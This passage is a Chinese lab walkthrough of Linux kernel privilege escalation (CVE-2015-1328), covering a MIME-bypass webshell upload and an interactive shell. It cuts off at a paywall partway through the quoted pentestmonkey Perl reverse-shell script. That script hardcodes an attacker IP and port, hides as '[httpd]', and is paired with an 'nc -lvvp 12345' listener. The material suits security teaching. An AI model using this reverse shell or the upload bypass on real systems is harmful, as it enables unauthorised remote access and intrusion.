本文介绍了如何利用Linux内核漏洞CVE-2015-1328进行提权的详细步骤。首先,通过文件上传突破MIME限制获取webshell,接着创建交互式shell,然后查找并利用针对3.19.0-15内核的提权exp,最终成功将权限提升到root。整个过程涉及环境搭建、shell交互、漏洞搜索与利用等关键环节。
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
文章目录
一、LINUX 内核漏洞提权
1、漏洞背景:
通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果想进行内网渗透就必须将权限提权到最高,如系统权限、超级管理员权限。
2、漏洞利用:
(1)实验环境
1.靶机环境:
(1)虚拟机Ubuntu 15.5.04【www.moontester.com】
(2)脚本语言环境:perl/python/php均存在
(3)内核版本:3.19.0-15-generic
2.攻击主机:
(1)虚拟机Win7【192.168.97.130】
(2)Firefox+Burpsuite+蚁剑+nc瑞士军刀
3.网络环境:
(1)VMware搭建的NAT网络
(2)靶机链接
URL:http://www.moontester.com/upload.php
(3)突破MIME类型限制文件上传获取webshell
第一步: 通过文件上传漏洞获取靶机的webshell
如下图所示,访问文件上传漏洞页面http://www.moontester.com/upload.php,然后BurpSuite抓包改包修改Content-Type文件类型突破文件上传限制从而上传一句话木马:
第二步: 蚁剑连接webshell
如下图所示,我们打开蚁剑,然后连接刚刚上传到靶机上的webshell:
(4)创建交互式shell
第一步: linux 提权的前提需要交互式shell ,可以使用工具perl-reverse-shell.pl建立sockets,那么如何建立sockets呢?(sockets是接口、插口的意思,这里我们一般引申为一条TCP连接的隧道)
如下所示,perl-reverse-shell.pl脚本,脚本内有建立sockets的说明
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. The author accepts no liability
# for damage caused by this tool. If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";
# Where to send the reverse shell. Change these.
# reverse是反向的意思,这里的方向定义的规则是:
# 攻击者对靶机的攻击是正向,靶机向攻击者发送请求是反向
my $ip = '192.168.97.130'; # 向攻击者的ip发送连接请求
my $port = 12345; # 向攻击者的ip的某端口发送连接请求
# 攻击者需要他提前开启侦听12345端口,也就是使用瑞士军刀命令工具:nc -lvvp 12345
# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any
# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);
# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";
# Change the process name to be less conspicious
$0 = "[httpd]";
# Authenticate based on source IP address if required
if (defined($ENV{
'REMOTE_ADDR'})) {
cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
if ($auth) {
unless ($ENV{
'REMOTE_ADDR'} =~ $authorised_client_pattern) {
cgiprint("ERROR: Your client isn't authorised to view this page");
cgiexit();
}
}
} elsif ($auth) {<
最低0.47元/天 解锁文章
扫一扫
974
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
